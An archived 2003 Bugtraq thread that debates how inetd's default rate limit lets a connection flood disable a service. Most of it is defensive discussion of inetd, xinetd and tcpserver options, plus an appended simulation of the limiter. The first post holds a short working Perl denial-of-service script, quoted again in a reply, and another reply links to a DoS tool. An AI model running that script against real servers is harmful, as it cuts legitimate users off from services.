10648677 2003-09-06 18:08 +0400 /87 lines/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Imported: 2003-09-06 23:41 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: 3APA3A@SECURITY.NNOV.RU
Recipient: Bugtraq (import) <28850>
Subject: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Message-ID: <434148437.20030906180822@SECURITY.NNOV.RU>
Dear bugtraq@securityfocus.com,
Well, we all blame Microsoft for insecure default
configuration... Isn't it time to clean up outdated code in Unix?
I. Intro
Saint_Byte reported a DoS vulnerability in wu-ftp. A small perl script (like
the one below) kills the ftp service... On closer look, we have the good old
inetd feature; a lot of existing FreeBSD/Linux installations are still
vulnerable. This problem has been known since ancient times [1] and has been
discussed again and again, but is still present. In fact, the problem is well
known. It's just another rake everyone steps on. It's in every man page and
FAQ, but maybe it's time to resolve it? Because it's definitely a BUG.
II. Who is vulnerable
Any system shipped with network daemons launched through inetd
(FreeBSD, SuSE, Red Hat, etc.).
III. Details
Inetd has an option
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
The problem is, a remote attacker can establish as many connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections are received in one minute? It will disable the service for
the next 10 minutes to help the attack succeed. Of course, this is documented.
The interval is not configurable.
something like
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping),
service terminated
will appear in the logs... If the connection is closed by the attacker
before the service actually starts, the IP address of the attacker will never be
logged.
IV. Workaround
-R 0 -s your_ad_can_be_here
or ask everyone not to bother your server.
V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
# Opens and immediately closes 300 TCP connections to HOST:PORT, enough to
# push an inetd service over its default -R limit of 256 invocations/minute.
use strict;
use warnings;
use Socket;

my ($host, $port) = @ARGV;
if (!defined $host || !defined $port) {
    print "\n Usage: $0 HOST PORT \n";
    exit 1;
}
my $iadr = inet_aton($host) or die "cannot resolve $host\n";
my $padr = sockaddr_in($port, $iadr);
for (my $i = 0; $i < 300; $i++) {
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"))
        or die "socket: $!\n";
    # A refused connect is skipped; an accepted one is closed at once, so
    # inetd counts the invocation but the server may never log the source.
    connect($sock, $padr) or next;
    close($sock);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
VI. References:
[1]Ari Luotonen, "www/tcp server failing (looping), service
terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
(10648677) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Rewrapped)
Comment in text 10657367 by Thamer Al-Harbash <tmh@whitefang.com>
Comment in text 10657450 by Dagmar d'Surreal <dagmar.wants@nospam.com>
Comment in text 10658540 by Mike Tancsa <mike@sentex.net>
Comment in text 10663307 by Dan Harkless <bugtraq@harkless.org>
Comment in text 10663553 by Darren Pilgrim <dmp@bitfreak.org>
10657367 2003-09-07 21:46 -0400 /26 lines/ Thamer Al-Harbash <tmh@whitefang.com>
Imported: 2003-09-08 19:59 by Brevbäraren
External recipient: 3APA3A <3APA3A@SECURITY.NNOV.RU>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28859>
Comment on text 10648677 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Thamer Al-Harbash <tmh@whitefang.com>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.BSF.4.51.0309072145220.54030@helena.whitefang.com>
On Sat, 6 Sep 2003, 3APA3A wrote:
> Dear bugtraq@securityfocus.com,
>
> Well, we all blame Microsoft in insecure default configuration... Isn't
> it time to clean outdated code in Unix?
This has been a known problem for quite a while. In fact
D. J. Bernstein already solved it with tcpserver:
http://cr.yp.to/ucspi-tcp.html
If you look at the bottom he points out pretty much what you
pointed out.
--
Thamer Al-Harbash
GPG Key fingerprint: D7F3 1E3B F329 8DD5 FAE3 03B1 A663 E359 D686 AA1F
"HLAGHLHALUAG (KTHANX)"
(10657367) /Thamer Al-Harbash <tmh@whitefang.com>/--
Comment in text 10658800 by Dan Stromberg <strombrg@dcs.nac.uci.edu>
10658800 2003-09-08 12:44 -0700 /33 lines/ Dan Stromberg <strombrg@dcs.nac.uci.edu>
Imported: 2003-09-09 00:52 by Brevbäraren
External recipient: Thamer Al-Harbash <tmh@whitefang.com>
External CC recipient: Dan Stromberg <strombrg@dcs.nac.uci.edu>
External CC recipient: 3APA3A <3APA3A@SECURITY.NNOV.RU>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28882>
Comment on text 10657367 by Thamer Al-Harbash <tmh@whitefang.com>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dan Stromberg <strombrg@dcs.nac.uci.edu>
To: Thamer Al-Harbash <tmh@whitefang.com>
Cc: Dan Stromberg <strombrg@dcs.nac.uci.edu>,
3APA3A <3APA3A@SECURITY.NNOV.RU>, bugtraq@securityfocus.com
Message-ID: <1063050294.23431.154.camel@tesuji.nac.uci.edu>
On Sun, 2003-09-07 at 18:46, Thamer Al-Harbash wrote:
> On Sat, 6 Sep 2003, 3APA3A wrote:
>
> > Dear bugtraq@securityfocus.com,
> >
> > Well, we all blame Microsoft in insecure default configuration... Isn't
> > it time to clean outdated code in Unix?
>
> This has been a known problem for quite a while. In fact
> D. J. Bernstein already solved it with tcpserver:
>
> http://cr.yp.to/ucspi-tcp.html
>
> If you look at the bottom he points out pretty much what you
> pointed out.
So DJB's program basically has a large listen queue, and goes into
queue-only mode after 40 concurrent connections?
If that's the case, then there's still a DOS - just fill the listen
queue with so much stuff that connections aren't serviced for a long
time.
--
Dan Stromberg DCS/NACS/UCI <strombrg@dcs.nac.uci.edu>
(10658800) /Dan Stromberg <strombrg@dcs.nac.uci.edu>/
Attachment (application/pgp-signature) in text 10658801
Comment in text 10669784 by Andres Kroonmaa <andre@online.ee>
10658801 2003-09-08 12:44 -0700 /8 lines/ Dan Stromberg <strombrg@dcs.nac.uci.edu>
Attachment filename: "signature.asc"
Imported: 2003-09-09 00:52 by Brevbäraren
External recipient: Thamer Al-Harbash <tmh@whitefang.com>
External CC recipient: Dan Stromberg <strombrg@dcs.nac.uci.edu>
External CC recipient: 3APA3A <3APA3A@SECURITY.NNOV.RU>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28883>
Attachment (application/pgp-signature) to text 10658800
Subject: Attachment (signature.asc) to: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQA/XNw2o0feVm00f/8RApQTAJ0eBWm22bEzvvK0OygACceOpBKvCgCeP6Qa
z2hCaNNB5pVHl6lluQ5QH9g=
=S27F
-----END PGP SIGNATURE-----
(10658801) /Dan Stromberg <strombrg@dcs.nac.uci.edu>/
10669784 2003-09-10 09:40 +0300 /37 lines/ Andres Kroonmaa <andre@online.ee>
Imported: 2003-09-10 22:37 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28936>
Comment on text 10658800 by Dan Stromberg <strombrg@dcs.nac.uci.edu>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Andres Kroonmaa" <andre@online.ee>
To: bugtraq@securityfocus.com
Message-ID: <3F5EF185.26987.22C7C6C6@localhost>
On 8 Sep 2003, at 12:44, Dan Stromberg <strombrg@dcs.nac.uci.edu>
wrote:
> So DJB's program basically has a large listen queue, and goes into
> queue-only mode after 40 concurrent connections?
>
> If that's the case, then there's still a DOS - just fill the listen
> queue with so much stuff that connections aren't serviced for a long
> time.
I wonder how many years it takes for people to realise that DOS
based on service flooding is not something you can be immune
to. Does it really take one DDOS per person to realise this simple
truth? For every single method you invent there are 10 other methods
to smash your box into nirvana anyway.
Purpose of inetd was never security, nor protection of box from
stupid applications it is called to start that can consume all
resources. Inetd fulfills its purpose. If you need more, you need
something else.
If you want security separation, use state-tracking firewall. If you
want to be immune from DOS, unplug from internet. All else is
pointless whining. Imagining that inetd should evolve into strong
firewall is as bizarre as it can get.
------------------------------------
Andres Kroonmaa <andre@online.ee>
CTO, Microlink Data AS
Tel: 6501 731, Fax: 6501 725
Pärnu mnt. 158, Tallinn
11317 Estonia
(10669784) /Andres Kroonmaa <andre@online.ee>/(Rewrapped)
10657450 2003-09-07 16:59 -0500 /115 lines/ Dagmar d'Surreal <dagmar.wants@nospam.com>
Imported: 2003-09-08 20:19 by Brevbäraren
External recipient: 3APA3A <3APA3A@SECURITY.NNOV.RU>
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28863>
Comment on text 10648677 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dagmar d'Surreal <dagmar.wants@nospam.com>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>, bugtraq@securityfocus.com
Message-ID: <1062971991.411.31.camel@lanshark.kung.foo>
On Sat, 2003-09-06 at 09:08, 3APA3A wrote:
> Dear bugtraq@securityfocus.com,
>
> Well, we all blame Microsoft in insecure default configuration... Isn't
> it time to clean outdated code in Unix?
>
> I. Intro
>
> Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
> one below) kills ftp service... With closer look we have good old inetd
> feature a lot of existing FreeBSD/linux installations are still
> vulnerable. This problem is known since ancient time [1] and was
> discussed again and again, but still present. In fact, problem is well
> known. It's just another rake everyone steps to. It's on any man and
> FAQ, but may be it's time to resolve it? Because it's definitely a BUG.
This is not a bug, it is merely very coarse resource control. You
have two choices... Allow only a certain number of connections to
the port, or allow an *infinite* number of connections to the port.
I don't know about your systems, but mine tend to get a little boggy
when processing an infinite number of connection requests.
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd (FreeBSD,
> SuSE, Red Hat, etc.).
>
> III. Details
>
> Inetd has an option
>
> -R rate
> Specify the maximum number of times a service can be invoked in
> one minute; the default is 256. A rate of 0 allows an unlimited
> number of invocations.
>
> The problem is, remote attacker can establish as much connections per
> minute as bandwidth allows... Now, guess how inetd reacts if more than
> 256 connections received in one minute? It will disable service for next
> 10 minutes to help attack to succeed. Of cause, this is documented.
> Interval is not configurable.
No, you miss the point. The service is disabled to prevent it from
eating you out of house and home so to speak. In any case, this only
restricts the number of connections per minute... total number of
connections over several minutes is another matter entirely.
> something like
>
> Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated
>
> will appear in logs... If connection is closed by attacker before
> service actually starts, IP address of attacker will never be logged.
Yep. More stuff that has entirely to do with how one's stack works
and very little to do with inetd. Send a packet with both SYN and
FIN set and you get this exact behaviour... little doughnut shaped
memory structures with a hole in the middle from the
already-disposed-of socket where the IP address should be.
> IV. Workaround
>
> -R 0 -s your_ad_can_be_here
I see... So you feel it's better to simply dare an attacker to try to
invoke three hundred bajillion copies of say, fingerd. How novel. I
can only hope the majority on the list realize why following your
suggestion is very bad.
Most people prefer to simply not use inetd for anything that is
supposed to withstand an assault, or to use xinetd instead because of
its improved ability to limit the connections... er... be easily
DoS'd.
> or ask everyone to do not bother your server.
>
> V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> #!/usr/bin/perl
>
> use Socket;
> $host=@ARGV[0];
> $port=@ARGV[1];
> if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
> $iadr=inet_aton($host);
> $padr=sockaddr_in($port,$iadr);
> for($i=0; $i < 300; $i++)
> {
> socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
> connect(SOCK,$padr) or next;
> close(SOCK);
> }
> print "\nDone\n";
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Octopus, something you surely should have heard about by now.
http://24.234.57.173/p3/octopus.c
> VI. References:
>
> [1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
> http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
References:
Google web search engine, "Good for avoiding embarrasment"
http://www.google.com
-- The email address above is just as phony as it looks, and for
obvious reasons. Instant messaging contact nfo: AIM: evilDagmar
Jabber: evilDagmar@jabber.org
(10657450) /Dagmar d'Surreal <dagmar.wants@nospam.com>/(Rewrapped)
Comment in text 10663780 by Mike Hoskins <mike@adept.org>
10663780 2003-09-08 15:46 -0700 /48 lines/ Mike Hoskins <mike@adept.org>
Imported: 2003-09-09 21:41 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28905>
Comment on text 10657450 by Dagmar d'Surreal <dagmar.wants@nospam.com>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Mike Hoskins <mike@adept.org>
To: bugtraq@securityfocus.com
Message-ID: <20030908153736.M64137@fubar.adept.org>
On Sun, 7 Sep 2003, Dagmar d'Surreal wrote:
> I see... So you feel it's better to simply dare an attacker to try to
> invoke three hundred bajillion copies of say, fingerd. How novel. I
> can only hope the majority on the list realize why following your
> suggestion is very bad.
luckily, i think anyone that actually reads the entire man page would
understand that. ;) from FreeBSD's inetd(8),
"
-c maximum
Specify the default maximum number of simultaneous invocations of
each service; the default is unlimited. May be overridden on a
per-service basis with the "max-child" parameter.
-C rate
Specify the default maximum number of times a service can be
invoked from a single IP address in one minute; the default is
unlimited. May be overridden on a per-service basis with the
"max-connections-per-ip-per-minute" parameter.
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
-s maximum
Specify the default maximum number of simultaneous invocations of
each service from a single IP address; the default is unlimited.
May be overridden on a per-service basis with the "max-child-per-
ip" parameter.
"
so there are much better ways to address the problem in modern
inetds. also, OS' i use make installing inetd at all optional.
furthermore, many Linux' i'm familiar with make xinetd the default...
so this is anything but 'default insecurity'.
-mrh
--
From: "Spam Catcher" <spam-catcher@adept.org>
To: spam-catcher@adept.org
Do NOT send email to the address listed above or
you will be added to a blacklist!
(10663780) /Mike Hoskins <mike@adept.org>/(Rewrapped)
10658540 2003-09-08 13:50 -0400 /45 lines/ Mike Tancsa <mike@sentex.net>
Imported: 2003-09-08 23:36 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: 3APA3A@SECURITY.NNOV.RU
Recipient: Bugtraq (import) <28874>
Comment on text 10648677 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Mike Tancsa <mike@sentex.net>
To: bugtraq@securityfocus.com
Cc: 3APA3A@SECURITY.NNOV.RU
Message-ID: <5.2.0.9.0.20030908134545.06dd9dd8@209.112.4.2>
At 06:08 PM 06/09/2003 +0400, 3APA3A wrote:
>The problem is, remote attacker can establish as much connections per
>minute as bandwidth allows... Now, guess how inetd reacts if more than
>256 connections received in one minute? It will disable service for next
>10 minutes to help attack to succeed. Of cause, this is documented.
>Interval is not configurable.
>
>something like
>
>Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service
>terminated
>
>will appear in logs... If connection is closed by attacker before
>service actually starts, IP address of attacker will never be logged.
>
>IV. Workaround
Hi, On FreeBSD's inetd there is the -C option in conjunction with the
-R option
-C rate
Specify the default maximum number of times a service can be
invoked from a single IP address in one minute; the default is
unlimited. May be overridden on a per-service basis with the
"max-connections-per-ip-per-minute" parameter.
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
You can run without either of these options, but then you risk a DoS
from resource starvation, e.g. invoke 1000 copies of ftpd and eat
up all the RAM/swap etc. It's problematic either way, but at least
you can mitigate the effects somewhat if it's a single host attacking.
---Mike
(10658540) /Mike Tancsa <mike@sentex.net>/(Rewrapped)
Comment in text 10668780 by Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
10668780 2003-09-09 10:07 -0400 /27 lines/ Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
Imported: 2003-09-10 19:12 by Brevbäraren
External recipient: Mike Tancsa <mike@sentex.net>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: 3APA3A@SECURITY.NNOV.RU
External CC recipient: strombrg@dcs.nac.uci.edu
Recipient: Bugtraq (import) <28915>
Comment on text 10658540 by Mike Tancsa <mike@sentex.net>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Jonathan A. Zdziarski" <jonathan@nuclearelephant.com>
To: Mike Tancsa <mike@sentex.net>
Cc: bugtraq@securityfocus.com, 3APA3A@SECURITY.NNOV.RU,
strombrg@dcs.nac.uci.edu
Message-ID: <1063116428.3334.7.camel@tantor.nuclearelephant.com>
I wonder how difficult it would be to port the Apache DOS Evasive
Maneuvers module to an inetd implementation. It does an excellent
job of both fending off Dos/DDoS/Brute Force attacks and it also will
talk to other tools on the network (Firewall, Router) to push the
attack back to the borders.
I would love a stab at doing this, but does anyone know where the
original inetd source tree could be found? You could theoretically do
this to the wrappers instead, but with consequences...so it makes more
sense to code it right into the inetd listener.
For reference the Apache DOS Evasive Maneuvers Module can be found at
http://www.nuclearelephant.com/projects/dosevasive/
The advantage to doing it this way is that nothing goes into 'queue'
mode, and nothing shuts down...you're cutting off the flooding host
(or hosts) and nobody else. It would be all too easy to detect an
inetd flood.
(10668780) /Jonathan A. Zdziarski <jonathan@nuclearelephant.com>/(Rewrapped)
Comment in text 10670507 by Greg A. Woods <woods@weird.com>
10670507 2003-09-10 14:47 -0400 /47 lines/ Greg A. Woods <woods@weird.com>
Imported: 2003-09-11 02:32 by Brevbäraren
External recipient: Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
External CC recipient: Mike Tancsa <mike@sentex.net>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: 3APA3A@SECURITY.NNOV.RU
External CC recipient: strombrg@dcs.nac.uci.edu
External replies to: woods@planix.com
Recipient: Bugtraq (import) <28955>
Comment on text 10668780 by Jonathan A. Zdziarski <jonathan@nuclearelephant.com>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: "Greg A. Woods" <woods@weird.com>
To: "Jonathan A. Zdziarski" <jonathan@nuclearelephant.com>
Cc: Mike Tancsa <mike@sentex.net>, bugtraq@securityfocus.com,
3APA3A@SECURITY.NNOV.RU, strombrg@dcs.nac.uci.edu
Message-ID: <m19x9zl-000B1VC@proven.weird.com>
[ On Tuesday, September 9, 2003 at 10:07:08 (-0400), Jonathan A. Zdziarski wrote: ]
> Subject: Re: 11 years of inetd default insecurity?
>
> I would love a stab at doing this, but does anyone know where the
> original inetd source tree could be found?
You don't want to start with the "original". Really.
You could start with my version. I've integrated the best features of
FreeBSD and OpenBSD into one derived from the NetBSD version.
See NetBSD's PR#18955. Let me know if you want the very latest
source from my local 1.6.x-STABLE tree (I should append it to the PR
soon though).
http://www.netbsd.org/cgi-bin/query-pr-single.pl?number=18955
> For reference the Apache DOS Evasive Maneuvers Module can be found at
> http://www.nuclearelephant.com/projects/dosevasive/
>
> The advantage to doing it this way is that nothing goes into 'queue'
> mode, and nothing shuts down...you're cutting off the flooding host (or
> hosts) and nobody else.
I will certainly take a look at the mechanisms implemented for Apache.
Thanks for posting this reference!
> It would be all too easy to detect an inetd
> flood.
Fending off D.D.o.S. attacks that make normal service requests of
public servers while still maintaining usable services is anything
but easy. :-)
--
Greg A. Woods
+1 416 218-0098 VE3TCP RoboHack <woods@robohack.ca>
Planix, Inc. <woods@planix.com> Secrets of the Weird <woods@weird.com>
(10670507) /Greg A. Woods <woods@weird.com>/(Rewrapped)
10663307 2003-09-08 16:24 -0700 /66 lines/ Dan Harkless <bugtraq@harkless.org>
Imported: 2003-09-09 19:42 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28893>
Comment on text 10648677 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Dan Harkless <bugtraq@harkless.org>
To: bugtraq@securityfocus.com
Message-ID: <200309082324.h88NOdgY009192@www.harkless.org>
On September 6, 2003, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd (FreeBSD,
> SuSE, Red Hat, etc.).
^^^^ ^^^ ^^^
On September 8, 2003, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> IMHO reasonable behavior is limiting a number of requests accepted per
> second without disabling service. But this code became a kind of saint
> cow. Only hope is young monsters like xinetd will rid this dinosaur off
> as a result of evolution.
Recent versions of Red Hat and SuSE default to installing xinetd, not
inetd. xinetd offers this commandline option:
-limit proc_limit
    This option places a limit on the number of concurrently running
    processes that can be started by xinetd. Its purpose is to prevent
    process table overflows.
and the following xinetd.conf options:
instances    determines the number of servers that can be simultaneously
             active for a service (the default is no limit). The value of
             this attribute can be either a number or UNLIMITED which means
             that there is no limit.
per_source   Takes an integer or "UNLIMITED" as an argument. This specifies
             the maximum instances of this service per source IP address.
             This can also be specified in the defaults section.
cps          Limits the rate of incoming connections. Takes two arguments.
             The first argument is the number of connections per second to
             handle. If the rate of incoming connections is higher than
             this, the service will be temporarily disabled. The second
             argument is the number of seconds to wait before re-enabling
             the service after it has been disabled. The default for this
             setting is 50 incoming connections and the interval is 10
             seconds.
max_load     Takes a floating point value as the load at which the service
             will stop accepting connections. For example: 2 or 2.5. The
             service will stop accepting connections at this load. This is
             the one minute load average. This is an OS dependent feature,
             and currently only Linux, Solaris, and FreeBSD are supported
             for this. This feature is only available if xinetd was
             configured with the -with-loadavg option.
plus per-service rlimit_{as,cpu,data,rss,stack}.
--
Dan Harkless
bugtraq@harkless.org
http://harkless.org/dan/
(10663307) /Dan Harkless <bugtraq@harkless.org>/----
10663553 2003-09-09 10:17 -0700 /42 lines/ Darren Pilgrim <dmp@bitfreak.org>
Imported: 2003-09-09 20:50 by Brevbäraren
External recipient: 3APA3A <3APA3A@SECURITY.NNOV.RU>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28900>
Comment on text 10648677 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Darren Pilgrim <dmp@bitfreak.org>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Cc: bugtraq@securityfocus.com
Message-ID: <20030909101712.302e5f9e.dmp@bitfreak.org>
On 2003.09.06 18:08:22 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> II. Who is vulnerable
>
> Any system shipped with network daemons launched through inetd
> (FreeBSD, SuSE, Red Hat, etc.).
FreeBSD doesn't run anything through inetd by default. You have to
manually edit inetd.conf to enable anything, and there is a warning
screen during the install process about doing so.
Additionally, FreeBSD's stock inetd has the following options:
-c maximum
Specify the default maximum number of simultaneous
invocations of each service; the default is unlimited.
May be overridden on a per-service basis with the
"max-child" parameter.
-C rate
Specify the default maximum number of times a service can
be invoked from a single IP address in one minute; the
default is unlimited. May be overridden on a per-service
basis with the "max-connections-per-ip-per-minute"
parameter.
-R rate
Specify the maximum number of times a service can be
invoked in one minute; the default is 256. A rate of 0
allows an unlimited number of invocations.
-s maximum
Specify the default maximum number of simultaneous
invocations of each service from a single IP address; the
default is unlimited. May be overridden on a per-service
basis with the "max-child-per-ip" parameter.
(10663553) /Darren Pilgrim <dmp@bitfreak.org>/------
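The behaviour the original post describes in section III (256 invocations per minute, then the service is shut off for a fixed 10 minutes, with the flooding address never logged), the per-source options the replies quote from FreeBSD's inetd(8), and xinetd's cps with its configurable re-enable interval can be compared on one replayed connection trace. The model below is an added example written for this page, not inetd's or xinetd's source code: a sliding-window limiter that approximates the semantics of -R and -C, fed a constructed trace in which one address opens 300 connections in 30 seconds (as the Perl loop in the first post does) while a legitimate client connects every 10 seconds for 12 minutes. The addresses, timings and the order of the checks inside accept() are assumptions of the model.

```python
"""Toy model of inetd-style service rate limiting (added example, not inetd code)."""
from collections import Counter, defaultdict, deque

MINUTE = 60.0
INETD_DISABLE = 600.0      # inetd's fixed 10-minute "service terminated" interval

ATTACKER = "10.0.0.66"     # constructed source addresses for the trace
CLIENT = "192.0.2.10"


class RateLimiter:
    """Per-service limiter in the style of inetd -R / -C (a model, not inetd's code).

    rate:        spawns allowed per window across all sources (-R); 0 = unlimited
    per_ip_rate: spawns allowed per window per source address (-C); None = unlimited
    window:      length of the rate window in seconds (inetd: one minute)
    disable_for: seconds the service stays off once `rate` is exceeded
    """

    def __init__(self, rate=256, per_ip_rate=None, window=MINUTE, disable_for=INETD_DISABLE):
        self.rate, self.per_ip_rate = rate, per_ip_rate
        self.window, self.disable_for = window, disable_for
        self.invocations = deque()          # spawn timestamps inside the current window
        self.per_ip = defaultdict(deque)    # the same, keyed by source address
        self.disabled_until = None
        self.log = []                       # (time, message) in the spirit of inetd's syslog lines

    def _expire(self, q, now):
        while q and now - q[0] >= self.window:
            q.popleft()

    def accept(self, now, src):
        """Return what happens to a connection from `src` arriving at time `now`."""
        if self.disabled_until is not None:
            if now < self.disabled_until:
                return "disabled"           # service is off: nothing spawned, nothing logged
            self.disabled_until = None
            self.log.append((now, "service re-enabled"))
        if self.per_ip_rate is not None:    # -C style: turn away only the busy source
            q = self.per_ip[src]
            self._expire(q, now)
            if len(q) >= self.per_ip_rate:
                return "rejected-src"
            q.append(now)
        if self.rate:                       # -R style: exceeding it shuts the service for everyone
            self._expire(self.invocations, now)
            if len(self.invocations) >= self.rate:
                self.disabled_until = now + self.disable_for
                self.log.append((now, "server failing (looping), service terminated"))
                return "disabled"
            self.invocations.append(now)
        return "spawned"


def flood_scenario(limiter, attacker_conns=300, client_every=10.0, horizon=12 * MINUTE):
    """Replay a constructed trace: the attacker opens `attacker_conns` connections at
    10 per second from one address, a legitimate client connects every `client_every`
    seconds until `horizon`. Returns outcome counts for the legitimate client only."""
    events = [(i / 10.0, ATTACKER) for i in range(attacker_conns)]
    t = 0.0
    while t < horizon:
        events.append((t, CLIENT))
        t += client_every
    outcomes = Counter()
    for now, src in sorted(events):
        result = limiter.accept(now, src)
        if src == CLIENT:
            outcomes[result] += 1
    return outcomes


if __name__ == "__main__":
    for label, limiter in [
        ("inetd default (-R 256, fixed 10 min disable)", RateLimiter()),
        ("same rate, 10 s re-enable interval", RateLimiter(disable_for=10.0)),
        ("-R 256 plus -C 20 per source", RateLimiter(per_ip_rate=20)),
    ]:
        result = flood_scenario(limiter)
        print(f"{label}: legitimate client {dict(result)}")
        for when, msg in limiter.log:
            print(f"    t={when:6.1f}s  inetd: {msg}")
```

With the defaults, the 30-second flood trips the limiter at t=25.3 s and the legitimate client is refused for the next ten minutes, while the only log line is the "looping" message, which names the service and not the flooder. Shortening the re-enable interval (the second argument of xinetd's cps) cuts the client's outage to tens of seconds, though the service flaps until enough of the flood has aged out of the window. A per-source cap in the style of -C rejects the flooding address after its first 20 connections and the service never trips at all.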
10657423 2003-09-08 14:07 +0400 /27 lines/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Imported: 2003-09-08 20:14 by Brevbäraren
External recipient: Paul Szabo <psz@maths.usyd.edu.au>
External CC recipient: bugtraq@securityfocus.com
External replies to: 3APA3A@SECURITY.NNOV.RU
Recipient: Bugtraq (import) <28862>
Comment on text 10657826 by Paul Szabo <psz@maths.usyd.edu.au>
Sent: 2003-09-08 21:18
Subject: Re[2]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: bugtraq@securityfocus.com
Message-ID: <391241550.20030908140700@SECURITY.NNOV.RU>
Dear Paul Szabo,
--Monday, September 8, 2003, 4:26:24 AM, you wrote to
3APA3A@SECURITY.NNOV.RU:
>> -R 0 -s your_ad_can_be_here
PS> Your cure is worse than the disease: rate limiting allows a DoS
PS> against the service, no limit allows a DoS against the whole
PS> machine.
-s limits the number of processes invoked from the same IP. You can
additionally use -c to prevent a distributed attack. It doesn't
allow the box to be DoSed and doesn't disable the service for 10 minutes.
--
~/ZARAZA
Well now, William, think this letter over carefully. (Twain)
(10657423) /3APA3A <3APA3A@SECURITY.NNOV.RU>/(Rewrapped)
10657826 2003-09-08 10:26 +1000 /30 lines/ Paul Szabo <psz@maths.usyd.edu.au>
Imported: 2003-09-08 21:18 by Brevbäraren
External recipient: 3APA3A@SECURITY.NNOV.RU
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28867>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: psz@maths.usyd.edu.au (Paul Szabo)
To: 3APA3A@SECURITY.NNOV.RU, bugtraq@securityfocus.com
Message-ID: <200309080026.h880QOc114306@milan.maths.usyd.edu.au>
3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
> III. Details
>
> Inetd has an option
> -R rate ... default is 256 ...
> ... if more than 256 connections received in one minute [inetd] will
> disable service for next 10 minutes ...
> ... IP address of attacker will never be logged.
>
> IV. Workaround
>
> -R 0 -s your_ad_can_be_here
I guess you are trying to say that xinetd is more configurable than
inetd. Yes, it is known that with inetd you need tcp_wrappers to log
attack IPs.
Your cure is worse than the disease: rate limiting allows a DoS
against the service, no limit allows a DoS against the whole machine.
Cheers,
